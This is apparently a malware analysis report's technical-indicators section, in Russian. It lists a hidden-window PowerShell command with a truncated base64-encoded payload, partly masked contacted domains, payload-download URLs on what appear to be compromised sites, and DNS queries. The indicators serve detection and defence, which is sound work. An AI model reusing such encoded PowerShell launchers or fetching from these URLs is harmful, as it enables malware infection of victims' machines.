Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...
- 'ma#####monkeymedia.com':80
- 'as###dum.com.au':80
- 'cl#####ltisaude.com.br':80
- 'cl###energy.pl':80
- 'cl###energy.pl':443
- http://as###dum.com.au/data/xVVjqa/
- http://cl#####ltisaude.com.br/erros/EFWlRHy/
- http://cl###energy.pl/wp-admin/enl3t-lklwtk-79/
- 'cl###energy.pl':443
- DNS ASK ma#####monkeymedia.com
- DNS ASK ar##ika.id
- DNS ASK as###dum.com.au
- DNS ASK cl#####ltisaude.com.br
- DNS ASK cl###energy.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...' (со скрытым окном)